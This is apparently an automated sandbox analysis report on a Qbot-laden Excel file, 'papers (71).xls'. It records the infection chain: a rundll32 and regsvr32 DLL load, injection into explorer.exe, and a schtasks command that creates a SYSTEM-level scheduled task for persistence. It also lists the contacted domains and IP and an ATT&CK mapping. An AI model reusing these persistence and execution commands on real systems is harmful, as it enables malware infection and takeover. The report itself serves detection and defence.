                Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\kdfe.vbox,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\kdfe.vbox,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn sgovokol /tr 'regsvr32.exe -s \'C:\Users\user\kdfe.vbox\'' /SC ONCE /Z /ST 22:40 /ET 22:52
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: kdfe.vbox.5.drStatic PE information: real checksum: 0x55188 should be: 0x5e339
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00130397 push dword ptr [esp+0Ch]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00130397 push dword ptr [esp+10h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0013009C push dword ptr [ebp-000000D8h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0013009C push dword ptr [ebp-000000E0h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0013009C push dword ptr [esp+10h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00130066 push dword ptr [ebp-000000D8h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00130005 push dword ptr [ebp-000000D8h]; ret
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003CA196 push ebx; ret
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003C9EE4 push cs; iretd
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003C9FE6 push cs; iretd
                Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\kdfe.vboxJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gifJump to dropped file
                Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\kdfe.vboxJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gifJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\kdfe.vbox
                Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\kdfe.vboxJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\kdfe.vboxJump to dropped file
                Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn sgovokol /tr 'regsvr32.exe -s \'C:\Users\user\kdfe.vbox\'' /SC ONCE /Z /ST 22:40 /ET 22:52

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2952 base: B102D value: E9 A4 61 2F 00
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gifJump to dropped file
                Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Windows\SysWOW64\explorer.exe TID: 2940Thread sleep time: -96000s >= -30000s
                Source: C:\Windows\System32\taskeng.exe TID: 532Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B1217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B5986 lstrlenA,GetOEMCP,GetSystemInfo,lstrlenA,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,MultiByteToWideChar,
                Source: rundll32.exe, 00000004.00000002.2094451379.0000000000620000.00000004.00000020.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
                Source: rundll32.exe, 00000004.00000002.2094451379.0000000000620000.00000004.00000020.sdmpBinary or memory string: ROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
                Source: rundll32.exe, 00000004.00000002.2094451379.0000000000620000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001303F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00130397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0013009C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00130469 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003A75E6 RtlAddVectoredExceptionHandler,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3E0000 protect: page read and write
                Injects code into the Windows Explorer (explorer.exe)Show sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2952 base: 3E0000 value: 9C
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2952 base: B102D value: E9
                Maps a DLL or memory area into another processShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3E0000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B102D
                Yara detected hidden Macro 4.0 in ExcelShow sources
                Source: Yara matchFile source: papers (71).xls, type: SAMPLE
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\kdfe.vbox,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn sgovokol /tr 'regsvr32.exe -s \'C:\Users\user\kdfe.vbox\'' /SC ONCE /Z /ST 22:40 /ET 22:52
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B3630 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,SetEntriesInAclA,GetOEMCP,lstrlenA,lstrlenA,GetCurrentProcessId,LocalAlloc,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,GetOEMCP,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetOEMCP,lstrcpynA,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,
                Source: explorer.exe, 00000005.00000002.2356286176.0000000000B70000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 00000005.00000002.2356286176.0000000000B70000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000005.00000002.2356286176.0000000000B70000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003AE9CF GetSystemTimeAsFileTime,GetOEMCP,GetOEMCP,MultiByteToWideChar,GetOEMCP,
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B88FD lstrcpynA,lstrcpynA,lstrcpynA,lstrlenA,GetCurrentProcessId,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LookupAccountNameW,lstrcpynA,MultiByteToWideChar,lstrcpynA,LookupAccountNameW,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrcpynA,Sleep,lstrlenA,GetCurrentProcessId,
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_003B5411 GetCurrentProcess,MultiByteToWideChar,MultiByteToWideChar,GetModuleFileNameW,lstrcpynA,lstrlenA,GetCurrentProcessId,memset,MultiByteToWideChar,lstrcpynA,GetVersionExA,GetOEMCP,GetOEMCP,GetCurrentProcessId,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,GetOEMCP,
                Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected QbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2094377277.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2356101330.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 5.2.explorer.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.explorer.exe.3a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected QbotShow sources
                Source: Yara matchFile source: 00000004.00000002.2094377277.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2356101330.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 5.2.explorer.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.explorer.exe.3a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsCommand and Scripting Interpreter1Scheduled Task/Job1Process Injection412Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsScripting21Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsNative API1Logon Script (Mac)Logon Script (Mac)Process Injection412NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                Cloud AccountsExploitation for Client Execution33Network Logon ScriptNetwork Logon ScriptScripting21LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery16Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 358604 Sample: papers (71).xls Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 43 Found malware configuration 2->43 45 Multi AV Scanner detection for dropped file 2->45 47 Sigma detected: Schedule REGSVR windows binary 2->47 49 11 other signatures 2->49 9 EXCEL.EXE 88 41 2->9         started        14 taskeng.exe 1 2->14         started        process3 dnsIp4 39 remedial.aaua.edu.ng 9->39 41 aaua.edu.ng 104.196.7.213, 443, 49167 GOOGLEUS United States 9->41 35 C:\Users\user\AppData\Local\...\1502[1].gif, MS-DOS 9->35 dropped 59 Document exploit detected (process start blacklist hit) 9->59 61 Document exploit detected (UrlDownloadToFile) 9->61 16 rundll32.exe 9->16         started        18 regsvr32.exe 14->18         started        20 regsvr32.exe 14->20         started        file5 signatures6 process7 process8 22 rundll32.exe 16->22         started        25 regsvr32.exe 18->25         started        27 regsvr32.exe 20->27         started        signatures9 51 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 22->51 53 Injects code into the Windows Explorer (explorer.exe) 22->53 55 Writes to foreign memory regions 22->55 57 2 other signatures 22->57 29 explorer.exe 8 1 22->29         started        process10 file11 37 C:\Users\user\kdfe.vbox, MS-DOS 29->37 dropped 63 Drops PE files to the user root directory 29->63 33 schtasks.exe 29->33         started        signatures12 process13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                papers (71).xls47%VirustotalBrowse
                papers (71).xls45%ReversingLabsDocument-Excel.Backdoor.Quakbot

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gif100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gif22%MetadefenderBrowse
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1502[1].gif89%ReversingLabsWin32.Backdoor.Quakbot
                C:\Users\user\kdfe.vbox8%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                aaua.edu.ng1%VirustotalBrowse
                remedial.aaua.edu.ng2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                aaua.edu.ng
                104.196.7.213
                truefalseunknown
                remedial.aaua.edu.ng
                unknown
                unknowntrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2097138405.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094775548.0000000002387000.00000002.00000001.sdmpfalse
                  high
                  http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpfalse
                    high
                    http://investor.msn.comrundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpfalse
                      high
                      http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpfalse
                        high
                        http://www.%s.comPArundll32.exe, 00000004.00000002.2095412048.0000000002BF0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2356334217.0000000002040000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2356236922.0000000000860000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2100983303.0000000000CA0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2097138405.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094775548.0000000002387000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2095412048.0000000002BF0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2356334217.0000000002040000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2356236922.0000000000860000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2100983303.0000000000CA0000.00000002.00000001.sdmpfalse
                          high
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2097138405.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094775548.0000000002387000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpfalse
                            high
                            http://servername/isapibackend.dllregsvr32.exe, 0000000A.00000002.2102220573.0000000000A20000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2100622492.0000000000840000.00000002.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://investor.msn.com/rundll32.exe, 00000003.00000002.2096147925.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094608383.00000000021A0000.00000002.00000001.sdmpfalse
                              high

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              104.196.7.213
                              unknownUnited States
                              15169GOOGLEUSfalse

                              General Information

                              Joe Sandbox Version:31.0.0 Emerald
                              Analysis ID:358604
                              Start date:25.02.2021
                              Start time:22:37:53
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 6m 48s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:papers (71).xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:15
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLS@18/12@1/1
                              EGA Information:
                              • Successful, ratio: 50%
                              HDC Information:
                              • Successful, ratio: 90% (good quality ratio 88.9%)
                              • Quality average: 89.6%
                              • Quality standard deviation: 18.8%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xls
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42, 8.248.119.254, 67.26.75.254, 67.27.158.126, 8.248.117.254, 67.27.159.254
                              • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                              • Execution Graph export aborted for target rundll32.exe, PID 2328 because there are no executed function
                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              22:38:42API Interceptor19x Sleep call for process: rundll32.exe modified
                              22:38:44API Interceptor434x Sleep call for process: explorer.exe modified
                              22:38:45Task SchedulerRun new task: sgovokol path: regsvr32.exe s>-s "C:\Users\user\kdfe.vbox"
                              22:38:45API Interceptor1x Sleep call for process: schtasks.exe modified
                              22:38:45API Interceptor439x Sleep call for process: taskeng.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              104.196.7.213claim (78).xlsGet hashmaliciousBrowse
